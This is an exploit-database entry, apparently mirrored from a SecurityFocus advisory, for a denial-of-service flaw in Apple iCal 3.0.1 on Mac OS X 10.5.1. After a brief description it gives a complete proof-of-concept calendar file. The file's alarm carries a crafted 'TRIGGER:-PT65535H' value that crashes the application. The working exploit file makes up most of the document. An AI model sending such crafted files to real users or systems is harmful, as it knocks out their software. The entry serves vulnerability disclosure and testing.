Apple iCal 3.0.1 - 'TRIGGER' Denial of Service

EDB-ID:

31619




Platform:

OSX

Date:

2008-04-21


source: https://www.securityfocus.com/bid/28632/info

Apple iCal is prone to a denial-of-service vulnerability because it fails to handle specially crafted files.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected.

BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR